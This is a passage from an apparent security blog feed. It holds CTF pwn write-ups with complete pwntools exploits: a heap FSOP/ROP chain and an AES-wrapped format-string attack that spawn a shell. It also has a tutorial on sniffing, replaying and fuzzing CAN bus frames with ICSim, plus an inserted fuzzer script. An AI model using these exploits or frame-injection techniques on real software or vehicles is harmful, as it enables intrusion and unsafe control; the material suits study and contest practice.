class="hljs-keyword">ru</span>(<span class="hljs-string">"[+] input your content"</span>)<br> s(content)<br><br>def <span class="hljs-keyword">delete</span>(<span class="hljs-built_in">index</span>):<br> cmd(<span class="hljs-number">3</span>)<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">"[+] input your index"</span>)<br> <span class="hljs-keyword">sl</span>(str(<span class="hljs-built_in">index</span>))<br><br>def show(<span class="hljs-built_in">index</span>):<br> cmd(<span class="hljs-number">4</span>)<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">"[+] input your index"</span>)<br> <span class="hljs-keyword">sl</span>(str(<span class="hljs-built_in">index</span>))<br><br><br><span class="hljs-built_in">add</span>(<span class="hljs-number">0</span>,<span class="hljs-number">0</span>x520)<br><span class="hljs-built_in">add</span>(<span 
class="hljs-number">1</span>,<span class="hljs-number">0</span>x500)<br><span class="hljs-built_in">add</span>(<span class="hljs-number">2</span>,<span class="hljs-number">0</span>x510)<br><br><span class="hljs-keyword">delete</span>(<span class="hljs-number">0</span>)<br><span class="hljs-built_in">add</span>(<span class="hljs-number">3</span>,<span class="hljs-number">0</span>x560)<br><span class="hljs-keyword">delete</span>(<span class="hljs-number">2</span>)<br><br>show(<span class="hljs-number">0</span>)<br>io.recv()<br>libcbase=u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>))-<span class="hljs-number">0</span>x21b110<br><span class="hljs-keyword">lg</span>(<span class="hljs-string">"libcbase"</span>)<br>one=[<span class="hljs-number">0</span>x50a47,<span class="hljs-number">0</span>xebc81,<span class="hljs-number">0</span>xebc85,<span class="hljs-number">0</span>xebc88,<span class="hljs-number">0</span>xebce2,<span class="hljs-number">0</span>xebd3f,<span class="hljs-number">0</span>xebd43]<br>onegadget=libcbase+one[<span class="hljs-number">1</span>]<br>l_next=libcbase+<span class="hljs-number">0</span>x3fe890<br>rtld_global=libcbase+<span class="hljs-number">0</span>x3fd040<br><span class="hljs-built_in">system</span>=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br>bin_sh=libcbase+<span class="hljs-keyword">next</span>(libc.<span class="hljs-built_in">search</span>(<span class="hljs-keyword">b</span><span class="hljs-string">'/bin/sh\x00'</span>))<br>setcontext=libcbase+libc.sym[<span class="hljs-string">'setcontext'</span>]+<span class="hljs-number">61</span><br>_IO_list_all = libcbase + libc.sym[<span class="hljs-string">'_IO_list_all'</span>]<br><span class="hljs-keyword">ret</span>=libcbase+<span class="hljs-number">0</span>x0000000000029139<br>pop_rdi=libcbase+<span class="hljs-number">0</span>x000000000002a3e5<br><span 
class="hljs-keyword">lg</span>(<span class="hljs-string">"l_next"</span>)<br><span class="hljs-keyword">lg</span>(<span class="hljs-string">"rtld_global"</span>)<br><br><span class="hljs-keyword">edit</span>(<span class="hljs-number">0</span>,<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">0</span>x10)<br>show(<span class="hljs-number">0</span>)<br><span class="hljs-keyword">ru</span>(<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">0</span>x10)<br>heapbase=uheap()-<span class="hljs-number">0</span>x290<br><span class="hljs-keyword">lg</span>(<span class="hljs-string">"heapbase"</span>)<br><span class="hljs-keyword">edit</span>(<span class="hljs-number">0</span>,p64(libcbase+<span class="hljs-number">0</span>x21b110)*<span class="hljs-number">2</span>+p64(heapbase+<span class="hljs-number">0</span>x290)+p64(_IO_list_all-<span class="hljs-number">0</span>x20))<br><br><br><span class="hljs-built_in">add</span>(<span class="hljs-number">4</span>,<span class="hljs-number">0</span>x590)<br><br>fake_heap=heapbase+<span class="hljs-number">0</span>x1200<br>IO_wfile_jumps = libcbase + <span class="hljs-number">0</span>x2170c0<br><span class="hljs-keyword">lg</span>(<span class="hljs-string">"fake_heap"</span>)<br>fake_file = <span class="hljs-keyword">b</span><span class="hljs-string">''</span><br>fake_file = p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">1</span>)<br>fake_file = fake_file.ljust(<span class="hljs-number">0</span>x80,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>)+p64(fake_heap)<br>fake_file = fake_file.ljust(<span class="hljs-number">0</span>xb8,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>)+p64(IO_wfile_jumps)<br>payload = cyclic(<span class="hljs-number">0</span>x10)+fake_file<br><span class="hljs-keyword">edit</span>(<span class="hljs-number">2</span>,payload)<br><br>payload = 
<span class="hljs-keyword">b</span><span class="hljs-string">''</span><br>payload = payload.ljust(<span class="hljs-number">0</span>x58,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>)+p64(setcontext)<br>payload = payload.ljust(<span class="hljs-number">0</span>xa0,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>)+p64(fake_heap+<span class="hljs-number">0</span>xf0)+p64(<span class="hljs-keyword">ret</span>)<br>payload = payload.ljust(<span class="hljs-number">0</span>xc0,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>)+p64(fake_heap)+p64(<span class="hljs-number">0</span>)*<span class="hljs-number">3</span>+p64(fake_heap-<span class="hljs-number">0</span>x10)+p64(<span class="hljs-number">0</span>)<br>payload +=p64(pop_rdi)+p64(bin_sh)+p64(<span class="hljs-built_in">system</span>)<br><span class="hljs-keyword">edit</span>(<span class="hljs-number">3</span>,payload)<br><br>cmd(<span class="hljs-number">5</span>)<br><span class="hljs-keyword">ia</span>()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>车联网can总线协议初探</title>
<link href="/2024/08/13/%E8%BD%A6%E8%81%94%E7%BD%91can%E6%80%BB%E7%BA%BF%E5%8D%8F%E8%AE%AE%E5%88%9D%E6%8E%A2/"/>
<url>/2024/08/13/%E8%BD%A6%E8%81%94%E7%BD%91can%E6%80%BB%E7%BA%BF%E5%8D%8F%E8%AE%AE%E5%88%9D%E6%8E%A2/</url>
<content type="html"><![CDATA[<h1 id="can总线协议"><a href="#can总线协议" class="headerlink" title="can总线协议"></a>The CAN bus protocol</h1><p>The CAN bus protocol (Controller Area Network) is a serial communication protocol used in vehicle networks. It was originally developed by Bosch in Germany in the 1980s for automotive electronic control systems, to solve the problem of communication between different electronic control units (ECUs). Some key characteristics of the CAN bus protocol:</p><ol><li><strong>High reliability and real-time behaviour</strong>: CAN supports fast data transfer with error detection and automatic retransmission, which keeps communication both reliable and timely.</li><li><strong>Multi-master architecture</strong>: the CAN bus is multi-master, meaning any node can put a message on the bus without going through a central controller.</li><li><strong>Short frame format</strong>: a classic CAN frame carries at most 8 data bytes, which keeps the bus efficient and meets the real-time requirements of vehicle control systems.</li><li><strong>Error detection mechanisms</strong>: the protocol has several error detection mechanisms, such as bit stuffing, frame check, acknowledgement check and a CRC, to protect the integrity and reliability of transmitted data.</li><li><strong>Message priority</strong>: the message identifier decides priority. A numerically lower identifier has higher priority, so urgent messages win arbitration and are sent first.</li><li><strong>Speed and distance</strong>: CAN supports bit rates up to 1 Mbit/s, but bit rate and bus length trade off against each other. In typical automotive applications the bus can reach a few hundred metres at lower rates.</li><li><strong>Wide use</strong>: besides automotive, CAN is widely used in industrial automation, medical devices and other embedded systems that need dependable communication.</li><li><strong>Extensibility</strong>: CAN can be combined with other in-vehicle protocols (such as CAN FD, LIN and FlexRay) to meet higher data-rate and functional requirements.</li></ol><p>The CAN bus plays a key role in vehicle networks: it lets the different automotive ECUs work together effectively, which is the basis for the growing intelligence and automation of vehicles.</p><h2 id="ICSim模拟"><a href="#ICSim模拟" class="headerlink" title="ICSim模拟"></a>ICSim simulation</h2><p>ICSim provides a dashboard with a speedometer, door-lock indicators, turn signals and a control panel. Its simulated controller lets the user interact with the simulated vehicle network: accelerate, brake, lock and unlock doors, and operate the turn signals. So ICSim can be used to simulate vehicle behaviour and capture the CAN frames it produces.</p><p>To set up the ICSim environment, first install the libraries ICSim depends on:</p><figure class="highlight q"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs q">sudo apt install libsdl2-<span class="hljs-built_in">dev</span> libsdl2-image-<span class="hljs-built_in">dev</span><br></code></pre></td></tr></table></figure><p>To send, receive and analyse CAN frames we need CAN analysis tools. can-utils is a set of Linux utilities that let Linux talk to an in-vehicle CAN network. can-utils contains four main tools that we use all the time:</p><figure class="highlight cmake"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs cmake">sudo apt <span class="hljs-keyword">install</span> can-utils<br><span 
class="hljs-comment">#candump : display, filter and log CAN frames to a file. candump does not decode the data.</span><br><span class="hljs-comment">#canplayer : replay recorded CAN frames.</span><br><span class="hljs-comment">#cansend : send a single CAN frame.</span><br><span class="hljs-comment">#cansniffer : display CAN frames and highlight the bytes that change.</span><br></code></pre></td></tr></table></figure><p>Then download ICSim:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">git clone https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/zombiecraig/</span>IcSim.git<br></code></pre></td></tr></table></figure><p>Change into the ICSim directory and run "make" to build it. After the build succeeds, first run setup_vcan.sh to create the vcan0 interface.</p><p>Then run ./icsim vcan0</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131003544.png" alt="image-20240813100329415"></p><p>Next, open another terminal and run ./controls vcan0</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131004729.png" alt="image-20240813100452654"></p><p>The controller is operated with the following keys:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs awk">Up arrow: accelerate<br>Left arrow: turn left<br>Right arrow: turn right<br>Right Shift + A/X: open left door (front/rear)<br>Right Shift + B/Y: open right door (front/rear)<br>Left Shift + A/X: close left door (front/rear)<br>Left Shift + B/Y: close right door (front/rear)<br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131005244.png" alt="image-20240813100521151"></p><p>We can use "candump vcan0" to capture the CAN traffic; as we operate the controller, the frames behind each command are captured. As shown below, on the left the captured frames are printed straight to the screen, which is rather messy to read.</p><p><img 
src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131006601.png" alt="image-20240813100645439"></p><p>Instead we can run "candump -l vcan0": candump then writes the captured traffic into a file named candump-xxx.log.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131007805.png" alt="image-20240813100726682"></p><p>Press Ctrl+C to stop capturing. Looking at the captured log: the first column, in parentheses, is the timestamp; the second column, vcan0, is our virtual CAN interface; after it come the arbitration ID and the data, separated by #.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131007685.png" alt="image-20240813100759574"></p><p>candump listens and records raw frames, so the log contains a lot of data that is of no use to us. can-utils also ships a tool that groups frames by arbitration ID and shows the bytes that change in red, which makes them much easier to pick out: cansniffer. We run "cansniffer -c vcan0" to monitor vcan0.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131008510.png" alt="image-20240813100858367"></p><p>A quick test: when I press the left arrow key, the left turn indicator lights up on the dashboard. At the same time the frames on the left start changing, but it is hard to spot exactly where.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131014563.png" alt="image-20240813101429325"></p><p>Articles online suggest taking a screenshot to pin the ID column on the left and then watching what changes while signalling left. I will skip the detailed screenshots and go straight to the result: "188#01000000" is the frame that operates the turn signal, and the same method shows that the right turn signal is "188#02000000". We can verify this with cansend:</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">cansend</span> vcan0 <span class="hljs-number">188</span>#<span class="hljs-number">01000000</span><br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131019950.png" alt="image-20240813101951792"></p><p>The same procedure makes it fairly easy to work out the ID and data of the accelerator command as well, so I will not repeat it. The approach is convenient, but not always applicable, for example when the situation is more complex and many IDs change at once. There is another way to isolate a vehicle command. First capture with "candump -l vcan0"; while capturing, press the accelerator, then release it so the speed drops back to minimum, then stop the capture.<br>That way the whole sequence ends up in the log file. We then replay it, sending everything in the log.<img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131022742.png" alt="image-20240813102210584"></p><p>The command is "canplayer -I candump-xxx.log", which resends the captured traffic. After sending it we can watch the whole acceleration and deceleration sequence play back; next we bisect the log to cut it down to the acceleration part.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131023931.png" alt="image-20240813102303776"></p><p>After analysis, "244#0000001xxx" turns out to be the acceleration command; replaying it produces visible acceleration.</p><h1 id="Fuzzing"><a href="#Fuzzing" class="headerlink" title="Fuzzing"></a>Fuzzing</h1><p>We can use SavvyCAN to fuzz the CAN protocol.</p><p>Installing SavvyCAN goes as follows.</p><p>First the Qt environment is needed; I use version 5.14.2 (<a href="https://download.qt.io/archive/qt/5.14/5.14.2/">https://download.qt.io/archive/qt/5.14/5.14.2/</a>; SavvyCAN requires Qt 5.14.0 or newer). Download the ".run" online installer, make it executable (chmod 755 qt-xxx.run) and run "./qt-xxx.run" to install. On my machine the install directory ended up as "~/Qt5.14.2/5.14.2".</p><h2 id="SavvyCAN的安装"><a href="#SavvyCAN的安装" class="headerlink" title="SavvyCAN的安装"></a>Installing SavvyCAN</h2><p>Installing SavvyCAN is a very easy and simple process. Pre-built binaries for Linux, Mac and Windows can be downloaded from <a href="http://www.savvycan.com/">www.savvycan.com</a>.</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">wget https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/collin80/</span>SavvyCAN<span class="hljs-regexp">/releases/</span>download<span class="hljs-regexp">/V199.1/</span>SavvyCAN-<span class="hljs-number">305</span>dafd-x86_64.AppImage<br></code></pre></td></tr></table></figure><p>The AppImage needs no installation; just run the executable file directly (chmod u+x is enough; world-writable permissions are not needed):</p><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs llvm">chmod <span class="hljs-number">777</span> SavvyCAN<span class="hljs-number">-305</span>dafd-<span class="hljs-keyword">x</span><span 
class="hljs-number">86</span>_<span class="hljs-number">64</span>.AppImage<br>./SavvyCAN<span class="hljs-number">-305</span>dafd-<span class="hljs-keyword">x</span><span class="hljs-number">86</span>_<span class="hljs-number">64</span>.AppImage<br></code></pre></td></tr></table></figure><p>After launching SavvyCAN we see:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131029784.png" alt="image-20240813102925713"></p><p>Since we intend to use SavvyCAN together with ICSim, we also need to install qtserialbus.</p><h2 id="安装qt5"><a href="#安装qt5" class="headerlink" title="安装qt5"></a>Installing Qt5</h2><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">wget</span> https://download.qt.io/official_releases/qt/<span class="hljs-number">5</span>.<span class="hljs-number">14</span>/<span class="hljs-number">5</span>.<span class="hljs-number">14</span>.<span class="hljs-number">2</span>/qt-opensource-linux-x64-<span class="hljs-number">5</span>.<span class="hljs-number">14</span>.<span class="hljs-number">2</span>.run<br></code></pre></td></tr></table></figure><p>After downloading Qt5 we install it by running the installer, with the following commands:</p><figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs applescript">chmod <span class="hljs-number">777</span> qt-opensource-linux-x64<span class="hljs-number">-5.14</span><span class="hljs-number">.2</span>.<span class="hljs-built_in">run</span><br>./qt-opensource-linux-x64<span class="hljs-number">-5.14</span><span class="hljs-number">.2</span>.<span class="hljs-built_in">run</span><br></code></pre></td></tr></table></figure><p>Note down the install path, because it is needed later.</p><p>Once Qt5 is installed, the next step is qtserialbus. It is not included in the official Ubuntu repositories, so we have to build it ourselves (check out the qtserialbus branch that matches the installed Qt, here 5.14, because the repository's default branch targets newer Qt versions).</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">$ </span><span class="language-bash">sudo apt install qtdeclarative5-dev qttools5-dev g++</span><br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">$ </span><span class="language-bash">git <span class="hljs-built_in">clone</span> https://github.com/qt/qtserialbus</span><br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">$ </span><span class="language-bash"><span class="hljs-built_in">cd</span> qtserialbus</span><br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">$ </span><span class="language-bash">/home/youlin/Qt5.14.2/5.14.2/gcc_64/bin/qmake .</span><br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">$ </span><span class="language-bash">make</span><br></code></pre></td></tr></table></figure><h2 id="编译SavvyCAN"><a href="#编译SavvyCAN" class="headerlink" title="编译SavvyCAN"></a>Building SavvyCAN</h2><p>To use qtserialbus we also have to build SavvyCAN from source with the same qmake, instead of relying on the AppImage downloaded earlier:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs awk">$ git clone https://github.com/collin80/SavvyCAN<br>$ cd SavvyCAN<br>$ /home/youlin/Qt5.14.2/5.14.2/gcc_64/bin/qmake CONFIG+=debug<br>$ make<br></code></pre></td></tr></table></figure><h2 id="启动SavvyCAN"><a href="#启动SavvyCAN" class="headerlink" 
title="启动SavvyCAN"></a>启动SavvyCAN</h2><p>启动我们刚刚编译好的SavvyCAN,而不是我们之前下载的appimage文件。</p><p>请记住,如果您想在真正的汽车上运行它,而不是使用qtserialbus的话,则可以直接使用appimage文件,而不必费劲巴拉地编译SavvyCAN了。</p><p>这样就可以连接到我们的ICSim了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131032820.png" alt="image-20240813103225736"></p><p>savvyCAN工具部分功能与我们上面使用的can-utils工具相同,下图为RE tools中的sniffer功能,与我们上面操作使用的cansniffer功能相同,但是savvyCAN中变化的数据使用了颜色进行标记,更便于我们辨识数据。</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131033148.png" alt="image-20240813103332995"></p><p>savvyCAN工具的重点即为fuzz功能,点击”Send Frames-fuzzing”就会出现下图中的fuzzing window,这个窗口中的功能适用于我们想要fuzz否个ID范围,并且可以自定义fuzz的数据。</p><p>下图中为我测试0x244 ID的fuzz效果<br><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131035514.png" alt="image-20240813103514377"></p>]]></content>
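As an added example (not code from the original post or from SavvyCAN), here is the fuzzing described above done from a script instead of the GUI: it sweeps an ID range the way SavvyCAN's fuzzing window does, randomises only the payload bytes you select while holding the rest constant, renders each frame in cansend syntax so it can be replayed with can-utils, and can transmit on a SocketCAN interface through python-can. The interface name vcan0, the python-can dependency (needed only to transmit) and the choice of bytes 3 and 4 for ID 0x244 are assumptions, not something the page states.

```python
import random
from dataclasses import dataclass

CAN_SFF_MASK = 0x7FF  # largest 11-bit (standard frame) identifier


@dataclass(frozen=True)
class Frame:
    can_id: int
    data: bytes

    def cansend(self):
        """Render in can-utils cansend syntax, e.g. '244#0011223344556677'."""
        return f"{self.can_id:03X}#{self.data.hex().upper()}"


def fuzz_frames(id_start, id_end, count, fuzz_bytes=range(8), base=bytes(8), seed=None):
    """Build `count` frames with IDs drawn from id_start..id_end (inclusive).

    Only the payload positions listed in `fuzz_bytes` are randomised; the
    others keep the value from `base`, which is how SavvyCAN's fuzzing window
    lets you hold part of a frame constant while sweeping the rest.
    A fixed `seed` makes the run reproducible, so a frame that upset the
    target can be replayed.
    """
    if id_start not in range(CAN_SFF_MASK + 1) or id_end not in range(id_start, CAN_SFF_MASK + 1):
        raise ValueError("ID range must lie within 0x000..0x7FF and start must not exceed end")
    if len(base) != 8:
        raise ValueError("base payload must be exactly 8 bytes")
    if any(i not in range(8) for i in fuzz_bytes):
        raise ValueError("fuzz_bytes must be payload positions 0..7")
    rng = random.Random(seed)
    frames = []
    for _ in range(count):
        data = bytearray(base)
        for i in fuzz_bytes:
            data[i] = rng.getrandbits(8)
        frames.append(Frame(rng.randint(id_start, id_end), bytes(data)))
    return frames


def send_frames(frames, channel="vcan0", interval=0.01):
    """Transmit on a SocketCAN interface (assumed: vcan0 is up, python-can installed).

    python-can is imported lazily so frame generation works without it.
    """
    import time
    import can  # python-can

    with can.Bus(channel=channel, interface="socketcan") as bus:
        for f in frames:
            bus.send(can.Message(arbitration_id=f.can_id, data=f.data, is_extended_id=False))
            time.sleep(interval)


if __name__ == "__main__":
    # ID 0x244 as in the screenshot; which bytes carry the signal in ICSim is
    # not stated on the page, so fuzzing bytes 3 and 4 here is an assumption.
    for frame in fuzz_frames(0x244, 0x244, count=5, fuzz_bytes=(3, 4), seed=1):
        print("cansend vcan0", frame.cansend())
```

Run it while candump or the SavvyCAN sniffer is watching vcan0 and the constant bytes stay fixed while the selected bytes change, which is exactly what the colour-coded sniffer view makes visible.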
</entry>
<entry>
<title>ciscn_final_awdp reproduction</title>
<link href="/2024/07/27/ciscn-final-awdp%E5%A4%8D%E7%8E%B0/"/>
<url>/2024/07/27/ciscn-final-awdp%E5%A4%8D%E7%8E%B0/</url>
<content type="html"><![CDATA[<h1 id="anime"><a href="#anime" class="headerlink" title="anime"></a>anime</h1><h2 id="fix"><a href="#fix" class="headerlink" title="fix"></a>fix</h2><p>The bug in this program is straightforward: an obvious format string vulnerability, with the user-controlled buffer passed to <code>printf</code> as the format argument.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407271704138.png" alt="image-20240727170449014"></p><p>Patching <code>call printf</code> into <code>call puts</code> is enough to fix it: puts treats the buffer as plain data, so no conversion specifiers are interpreted.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407271707173.png" alt="image-20240727170757086"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407271708798.png" alt="image-20240727170830701"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407271708809.png" alt="image-20240727170839727"></p><h2 id="break"><a href="#break" class="headerlink" title="break"></a>break</h2><p>The contest was played without network access. The hard part is that readline runs the input through AES decryption before it is used, so every payload has to be AES-encrypted first; many players did not have an AES script at hand, so not many solved it.</p><p>The approach: write the matching AES encryption (ECB with the 16-byte key taken from the binary), then follow the usual off-stack format string routine. Leak libc, stack and PIE addresses with <code>%p</code>; use the stack pointer at argument 17 as a write primitive (point it at the target with <code>%17$hn</code>, then write through it with <code>%45$hn</code>); overwrite the loop counter i so the loop keeps running; then overwrite the low bytes of the return address with a one_gadget and get a shell.</p><figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python">from pwn import *<br>from ctypes import *<br>from struct import pack<br>from Crypto.Cipher import AES<br>from Crypto.Util.Padding import pad, unpad<br>import base64<br>import binascii<br>banary = "./pwn"<br>elf = ELF(banary)<br>libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")<br>ip = '123.57.149.79'<br>port = 16274<br>local = 1<br>if local:<br>    io = process(banary)<br>else:<br>    io = remote(ip, port)<br><br>context(log_level = 'debug', os = 'linux', arch = 'amd64')<br><br>def dbg():<br>    gdb.attach(io)<br>    pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))<br>uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b'\x00'))<br>lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br># PKCS#7/base64 helpers, kept for reference but unused below: the binary<br># decrypts raw 16-byte blocks, so the payloads are NUL-padded and sent raw<br>def encrypt(raw, key):<br>    raw = pad(raw,16)<br>    cipher = AES.new(key, AES.MODE_ECB)<br>    return base64.b64encode(cipher.encrypt(raw)).decode("utf-8")<br><br>def decrypt(enc, key):<br>    enc = base64.b64decode(enc)<br>    cipher = AES.new(key, AES.MODE_ECB)<br>    return unpad(cipher.decrypt(enc),16)<br><br># AES-128 key hard-coded in the binary; readline() decrypts every input with it<br>password = binascii.unhexlify('7bf35cd69c475d5e6f1d7a23187bf934')<br><br>ru("linsir want to know your name\n")<br>sl(b'youlin')<br><br># leak: %15$p = return address into libc, %17$p = a stack pointer,<br># %19$p = an address inside the PIE binary<br>ru("your favourite anime:")<br>text = b'%15$p%17$p%19$p'.ljust(32,b'\x00')<br>aes = AES.new(password,AES.MODE_ECB)<br><br>payload = aes.encrypt(text)<br>sl(payload)<br><br>ru("0x")<br>libcbase=int(io.recv(12),16)-0x24083<br>lg("libcbase")<br>one=[0xe3afe,0xe3b01,0xe3b04]<br>one_gadget=libcbase+one[1]<br>lg("one_gadget")<br><br>ru("0x")<br>stack=int(io.recv(12),16)<br>lg("stack")<br>ret_addr=stack-0xf0     # saved return address (offset found in gdb)<br>i_addr=stack-0x124      # loop counter i (offset found in gdb)<br>lg("i_addr")<br><br>ru("0x")<br>base=int(io.recv(12),16)-0x150f<br>lg("base")<br><br># write primitive: the pointer at argument 17 points at the slot that is read<br># as argument 45, so %17$hn repoints it and %45$hn then writes through it.<br># Step 1: overwrite i with 0xffff so the loop does not end<br>ru("what's your favourite anime:")<br>text = b'%'+str(i_addr&0xffff).encode()+b'c%17$hn'<br>text = text.ljust(0x30,b'\x00')<br>aes = AES.new(password,AES.MODE_ECB)<br>payload = aes.encrypt(text)<br>sl(payload)<br><br>ru("what's your favourite anime:")<br>text = b'%'+str(0xffff).encode()+b'c%45$hn'<br>text = text.ljust(0x40,b'\x00')<br>aes = AES.new(password,AES.MODE_ECB)<br>payload = aes.encrypt(text)<br>s(payload)<br><br># Step 2: low 16 bits of the return address become the low 16 bits of one_gadget<br>ru("what's your favourite anime:")<br>text = b'%'+str(ret_addr&0xffff).encode()+b'c%17$hn'<br>text = text.ljust(0x40,b'\x00')<br>aes = AES.new(password,AES.MODE_ECB)<br>payload = aes.encrypt(text)<br>s(payload)<br><br>ru("what's your favourite anime:")<br>text = b'%'+str(one_gadget&0xffff).encode()+b'c%45$hn'<br>text = text.ljust(0x40,b'\x00')<br>aes = AES.new(password,AES.MODE_ECB)<br>payload = aes.encrypt(text)<br>s(payload)<br>lg("one_gadget")<br><br># Step 3: bits 16..31 of the return address; the upper bytes already match<br># because the saved return address points into libc as well<br>ru("what's your favourite anime:")<br>text = b'%'+str((ret_addr+2)&0xffff).encode()+b'c%17$hn'<br>text = text.ljust(0x40,b'\x00')<br>aes = AES.new(password,AES.MODE_ECB)<br>payload = aes.encrypt(text)<br>s(payload)<br><br>ru("what's your favourite anime:")<br>text = b'%'+str((one_gadget>>16)&0xffff).encode()+b'c%45$hn'<br>text = text.ljust(0x40,b'\x00')<br>aes = AES.new(password,AES.MODE_ECB)<br>payload = aes.encrypt(text)<br>s(payload)<br><br># Step 4: set i back to 1 so the loop exits and the function returns into one_gadget<br>ru("what's your favourite anime:")<br>text = b'%'+str(i_addr&0xffff).encode()+b'c%17$hn'<br>text = text.ljust(0x30,b'\x00')<br>aes = AES.new(password,AES.MODE_ECB)<br>payload = aes.encrypt(text)<br>sl(payload)<br><br>ru("what's your favourite anime:")<br>text = b'%'+str(1).encode()+b'c%45$hn'<br>text = text.ljust(0x40,b'\x00')<br>aes = AES.new(password,AES.MODE_ECB)<br>payload = aes.encrypt(text)<br>s(payload)<br><br>ia()<br></code></pre></td></tr></table></figure><h1 id="ezheap"><a href="#ezheap" class="headerlink" title="ezheap"></a>ezheap</h1><h2 id="fix-1"><a href="#fix-1" class="headerlink" title="fix"></a>fix</h2><p>This one was odd: when our team first worked on it we missed the heap overflow further down, fixed only the UAF and uploaded the patch, and it passed the check anyway.</p><p>Fixing the UAF just means zeroing the pointer after free. The binary even lets you change segment permissions, and the check was the loosest I have seen in an AWDP.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407272057322.png" 
